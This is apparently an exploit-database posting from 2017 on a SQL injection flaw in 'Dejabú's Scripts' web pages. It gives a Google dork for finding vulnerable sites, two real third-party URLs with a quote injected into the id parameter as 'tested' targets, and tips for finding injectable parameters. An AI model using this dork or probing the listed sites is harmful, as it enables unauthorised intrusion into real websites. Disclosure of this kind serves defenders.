Dejabú's Scripts SQL Injection

2017.02.21

fl3xpl0it (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:Diseño de páginas web Dejabú inurl:php?id=

<—————— header data start ——————- >
#############################################################
# Application Name : SQLi in Dejabú's Scripts
# Vulnerable Type : SQL İnjection
# Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
# Author: fl3xpl0it a.k.a KurokoTetsuya
# Date: 20.02.2017
# Tested On Demo Sites:
[+] http://www.cepaproduccion.com/content/news.php?id=1114'
[+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
# Warning: If you not found SQLi , you try SQLi other parameter.
# Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
# Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
#############################################################
< ——————- header data end of ——————- >

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dejabú's Scripts SQL Injection

Dork: intext:Diseño de páginas web Dejabú inurl:php?id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.